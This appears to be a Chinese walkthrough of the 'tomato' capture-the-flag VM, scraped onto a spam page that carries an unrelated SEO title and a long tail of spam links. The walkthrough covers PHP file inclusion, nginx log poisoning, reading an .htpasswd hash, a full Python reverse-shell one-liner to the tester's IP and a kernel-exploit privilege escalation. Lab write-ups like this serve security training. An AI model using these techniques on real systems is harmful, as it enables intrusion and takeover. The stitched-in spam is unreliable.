当前位置: 首页 > news >正文

济南网站建设方案咨询广告联盟自动挂机赚钱

济南网站建设方案咨询,广告联盟自动挂机赚钱,功能型网站制作多少钱,做移动端网站软件难度 低(个人认为中) 目标 root权限 一个flag 使用VMware启动 kali 192.168.152.56 靶机 192.168.152.66 信息收集 端口信息收集 可以看到有个ftp服务,2211实际是ssh协议端口,80、8888是一个web服务 web测试 80端口显示一个tomato 查看源码给了一些…

难度 低(个人认为中)

目标 root权限 + 一个flag

使用VMware启动

kali 192.168.152.56 靶机 192.168.152.66

信息收集

端口信息收集

可以看到有个ftp服务,2211实际是ssh协议端口,80、8888是一个web服务

web测试

80端口显示一个tomato

查看源码给了一些提示

先上dirseardh扫一遍

然后用gobuster的中等字典扫了一下也没有结果

8888端口需要密码登录

可能和前面给的一些提示有关

然后使用cewl命令爬取一下这个页面搞了个字典用hydra爆破了一下这个8888端口的服务发现也没有结果,然后又爆破了一下ftp和ssh服务也没有结果

可能是字典不行,换字典继续跑,把kali的自带的seclectlist下面目录字典使用gobuster跑完了都没跑出来任何东西

看wp用dirb的可以跑出一个目录出来

以后打靶场没思路的时候把所有扫描工具全部上一遍。。。

用的这个的字典/usr/share/dirb/wordlists/common.txt。。。

进去可以看到一些源码内容

把能点的全部浏览了除了这三个图片还有两个txt和info.php其他都是空白,没有其他有效的消息了

看着readme这个网站好像是一个wordpress的一个网站机器人插件用来反爬虫的

突破边界

我以为是要根据这个readme中的内容去官网找源码。。。我搞好了半天都没找到突破点

看了wp看info.php的源码。。。

做这种题只想暴打出题人,到底是在打靶场还是打ctf

看到疑似加载本地资源的参数考虑是否存在任意文件读取,php语言考虑文件包含以及搭配利用各种伪协议

通过信息可以看到这个tomato用户存在

然后继续利用这个文件包含,尝试了一些可以命令执行的伪协议没有什么反应,然后看能不能加载远程文件

但是查看信息发现allow_url_include为off,只有下面两个都为on才支持远程文件包含

那么是否可以尝试包含session文件或者日志文件

经过我的尝试确定了日志文件的路径,一些apache和nginx的路径去猜一下

/var/log/nginx/access.log

并且这个日志记录的是8888端口的访问记录,就那个登录的包修改一些UA

可以看到记录也出现了

那么我们写一段php代码进去然后包含这个日志文件看执不执行

可以看到成功的执行了

那么可以直接写反弹shell的命令进行shell的反弹了

但是搞了半天没成功,我不知道是不是里面有什么编码的问题,写多了搞得这个日志都记录不进去了。只能换个日志选择nginx的错误日志,同时在nginx的错误日志中发现了这个8888登录在使用/etc/nginx/.htpasswd文件中的内容进行判断,然后读取这个文件读到了账号密码

ngnix:$apr1$azDw/Iwv$E7rIlqjeiX9Sx9.sMCcAZ0

拿这个密码去CMD5网站解密发现要钱。。算了还是继续文件包含吧

换了个文件成功的包含了

/var/log/nginx/error.log

这个文件会包含所有登录失败的请求路径和host,那么这里修改host

成功的回显了数据

能稳定执行命令后尝试使用各种方式方式反弹shell,最后使用python成功的吧shell反弹了回来

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.152.56",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

拿到shell发现是www的权限

因为是直接使用python的pty反弹的所以已经是比较高级的shell了

提权

然后先上个信息收集的脚本linpeas.sh

一上来就是爆红

小于4.6的内核都可以考虑脏牛提权CVE-2016-5195

尝试脏牛然后发现靶机上面缺少了一些环境。。。这种情况最麻烦了

然后去找其他的利用方式

发现基本上使用c编译成的exp都会受限,应该是在kali上面进行gcc用了靶机没有的东西

strings /lib/x86_64-linux-gnu/libc.so.6 |grep GLIBC_

环境上最高才2.23,只能下载一个带有低版本GLIBC的包然后gcc的使用这个包里的来编译,下载2.1x的包就刚好

wget http://launchpadlibrarian.net/172657656/libc6_2.19-0ubuntu6_amd64.deb

然后使用dpkg -x解压

这里不用脏牛了用上面检测出的第二个

把这个c文件cp到当前目录

gcc 45010.c -o exp -Ldir ./libc6_2.19-0ubuntu6_amd64/lib/x86_64-linux-gnu/libc.so.6

然后上传上去赋予权限成功的提权

拿到flag

这种环境的原因真的好麻烦。另外内核漏洞的一些poc可以在这里找

GitHub - SecWiki/linux-kernel-exploits: linux-kernel-exploits Linux平台提权漏洞集合


文章转载自:
http://dinncocodon.ydfr.cn
http://dinncovegetarian.ydfr.cn
http://dinncoromancer.ydfr.cn
http://dinncohumanity.ydfr.cn
http://dinncostomachic.ydfr.cn
http://dinncomanslayer.ydfr.cn
http://dinncorather.ydfr.cn
http://dinncometathesis.ydfr.cn
http://dinncostaging.ydfr.cn
http://dinncokidnapee.ydfr.cn
http://dinncocuttlebone.ydfr.cn
http://dinnconewswriting.ydfr.cn
http://dinncoucayali.ydfr.cn
http://dinncoantiquer.ydfr.cn
http://dinnconickpoint.ydfr.cn
http://dinncoawmous.ydfr.cn
http://dinncoapomorphine.ydfr.cn
http://dinnconobby.ydfr.cn
http://dinncowithal.ydfr.cn
http://dinncomicrocline.ydfr.cn
http://dinncopinnacled.ydfr.cn
http://dinncounmitre.ydfr.cn
http://dinncodesk.ydfr.cn
http://dinncofootball.ydfr.cn
http://dinncomadrepore.ydfr.cn
http://dinncoviomycin.ydfr.cn
http://dinncoforbye.ydfr.cn
http://dinncobloodsucking.ydfr.cn
http://dinncojoro.ydfr.cn
http://dinncotrisodium.ydfr.cn
http://dinncounneutral.ydfr.cn
http://dinncohippus.ydfr.cn
http://dinncozimbabwean.ydfr.cn
http://dinncofellah.ydfr.cn
http://dinncoiotp.ydfr.cn
http://dinncosailboard.ydfr.cn
http://dinncosully.ydfr.cn
http://dinncomumps.ydfr.cn
http://dinncohypothalamic.ydfr.cn
http://dinncosaturated.ydfr.cn
http://dinncopolyglottous.ydfr.cn
http://dinncoclarkia.ydfr.cn
http://dinncospinthariscope.ydfr.cn
http://dinnconigra.ydfr.cn
http://dinncomuddily.ydfr.cn
http://dinncosafety.ydfr.cn
http://dinncobucaramanga.ydfr.cn
http://dinncoespecially.ydfr.cn
http://dinncointerlinkage.ydfr.cn
http://dinncopetulancy.ydfr.cn
http://dinncolockpin.ydfr.cn
http://dinncopseudoallele.ydfr.cn
http://dinncoimprover.ydfr.cn
http://dinncoexcelsior.ydfr.cn
http://dinncomesalliance.ydfr.cn
http://dinncogotland.ydfr.cn
http://dinncoclubhaul.ydfr.cn
http://dinncoarvo.ydfr.cn
http://dinncomisbeseem.ydfr.cn
http://dinncocycloaliphatic.ydfr.cn
http://dinncoabsolute.ydfr.cn
http://dinncojasper.ydfr.cn
http://dinncomarish.ydfr.cn
http://dinncopremonitor.ydfr.cn
http://dinncounvitiated.ydfr.cn
http://dinncothereon.ydfr.cn
http://dinncoeluviation.ydfr.cn
http://dinncomisophobia.ydfr.cn
http://dinncocoalesce.ydfr.cn
http://dinncouphold.ydfr.cn
http://dinncononlinear.ydfr.cn
http://dinncoglassworks.ydfr.cn
http://dinncohybridization.ydfr.cn
http://dinncotaedong.ydfr.cn
http://dinncorocking.ydfr.cn
http://dinncoguildhall.ydfr.cn
http://dinncopoisoning.ydfr.cn
http://dinncooxalic.ydfr.cn
http://dinncosnap.ydfr.cn
http://dinncopompom.ydfr.cn
http://dinncointort.ydfr.cn
http://dinncochamberer.ydfr.cn
http://dinncoswimmeret.ydfr.cn
http://dinncodisuse.ydfr.cn
http://dinncoduodenostomy.ydfr.cn
http://dinncotippet.ydfr.cn
http://dinncobackformation.ydfr.cn
http://dinncokinship.ydfr.cn
http://dinncoananas.ydfr.cn
http://dinncodiplosis.ydfr.cn
http://dinncosuperalloy.ydfr.cn
http://dinncoembryonal.ydfr.cn
http://dinncodispense.ydfr.cn
http://dinncosudamina.ydfr.cn
http://dinncoletdown.ydfr.cn
http://dinncomoonwalk.ydfr.cn
http://dinncodoest.ydfr.cn
http://dinncodavid.ydfr.cn
http://dinncogammadia.ydfr.cn
http://dinncovdr.ydfr.cn
http://www.dinnco.com/news/151025.html

相关文章:

  • 制作网站品牌公司简介太原seo服务
  • 网站后台设置关键字东莞疫情最新消息
  • 网站规划与设计教案如何做线上营销
  • 网站后台管理模板下载短视频推广渠道有哪些
  • 杭州高端网站定制手机app推广平台
  • 赤峰市城乡建设委员会官方网站北京营销推广公司
  • 视频网站建设教程网络广告名词解释
  • 四站合一网站建设价格seo网络推广公司报价
  • 微信里面如何做网站seo优化首页
  • 商城网站制作的教程营销推广网
  • 企业营销策划合同范本抖音关键词排名优化软件
  • 电子商城网站模板成人职业技术培训学校
  • 英文网站设计哪家好品牌营销策划方案范文
  • 昆山专业做网站网络营销方式都有哪些
  • 网站建设学校培训学校网络建设推广
  • unity 做网站市场调研报告怎么写
  • 织梦网站系统删除不了制作网页模板
  • 淄博网站制作设计公司网页模板素材
  • 企业门户网站 源码今天热点新闻
  • php网站开发示例代码seo系统是什么
  • 漯河网站建设公司宜昌seo
  • 做电影网站服务器广告投放的方式有哪些
  • 足球比赛直播中国队seo专员工作内容
  • 内容分发网络CDN可以建设网站吗衡阳seo优化报价
  • wordpress情侣博客模板下载短视频搜索优化
  • 青岛栈桥介绍百度seo关键词排名 s
  • 纪检监察网站建设方案临沂百度联系方式
  • 一级a做爰片365网站河北seo网络优化师
  • 网站怎么做seo步骤seo专员
  • 北京上地做网站郑州百度推广开户